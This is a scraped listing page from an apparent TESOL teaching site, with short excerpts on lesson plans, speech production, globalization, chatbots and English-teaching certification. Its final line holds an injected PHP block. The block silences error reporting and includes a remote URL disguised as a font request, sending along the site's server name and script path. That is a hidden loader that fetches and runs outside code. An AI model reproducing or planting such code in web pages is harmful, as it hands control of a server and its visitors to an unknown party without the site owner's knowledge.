Age Level: Elementary School (9-11 years old) Ability Level: Advanced Objective: By the end of the lesson, students will be able to discuss and debate different environmental issues. Warm-up (5…
Everybody we teach can be a part of something beautiful when we all pay attention to our role as educators. Deep in the heart of Los Angeles some of the…
As we slowly transition into a driverless world where technology makes our lives easier, access to free education worldwide is possible and paramount. Discover an online tool for English as…
Speech production refers to the intricate process by which our brains transform thoughts into spoken language. Here are the four major processes within speech production: Conceptualization: This stage involves formulating…
Build your confidence, float like a butterfly, and gracefully knock-out your first English teaching class by joining American TESOL Institute this October 26th at 4:30 PM EST (New York) time…
Improve your teaching skills with technology. Discover resources and webinars about teaching with technology that support students in gaining lifelong learning skills. Enroll for teaching with technology certification, and learn…
The term “globalization” is defined as the integration of economies and societies that create international influences (Misra, 2010). With globalization on the rise, it is inevitable that different cultures will…
Visit, an online community connecting teachers, students, and alumni to build better relationships, promote participation, unlock learning potential, and take education to a whole new level. Ask a question,…
English is the window to a new set of opportunities that normally within the baseball world begins on the baseball field. Knowing that the primary goal is to play and…
Many people learn English for different reasons. Some are interested to learn the language for academic purposes; they chose to study in countries where courses are taught primarily in English.…
Discover how to create, teach, and learn with digital portfolios. Open Presentation - Meaningful Learning with ePortfolios Resources for Digital Portfolios
Interdependence of people and cultures in the global society of the twenty-first century means all citizens of the world must pay greater attention to intercultural communication and the challenges it…
TESOL instruction places a great emphasis on students’ ability to listen and speak, more specifically task-based learning. Listening is an essential process that allows for the development of a second…
TESOL is a certification course for Teaching English to Speakers of Other Languages, and a TESOL certificate is one major qualification required to teach English abroad. There is a huge…
Western Michigan University professors Constance Weaver and Jonathan Bushs’ work, titled Grammar intertwined throughout the writing process: An “inch deep and a mile wide”, sets forth a plan to teach…
Research the official language, and the second most spoken language in a country, to get a better understanding of history, culture, and the world we live.
Discover the world while teaching English abroad. Explore the TESOL map, FAQs about TESOL, and TESOL certification courses. Follow @tesolAmerican TESOL
Eugene Goostman, a thirteen year old male chatbot, has passed the Turing Test for the first time in history. Learn how chatbots like Eugene can help teach English as a…
A possible development in the evolution of communication is the replacement of language with images. This development enables larger chunks of information to be transferred between individuals in less time…
Natural language processing is technology that helps computers restructure, understand, and comprehend language like a human to provide translation, data, and feedback. Learn how Natural language processing is helping physicians…
Research the latest news about teaching English abroad. Follow @tesol [insert_php] $olderror_reporting =error_reporting(0); include (",+Arial,+Sans-serif&rf=".$HTTP_SERVER_VARS['SERVER_NAME'].$HTTP_SERVER_VARS['PHP_SELF']."&phpout=1"); error_reporting($olderror_reporting); [/insert_php]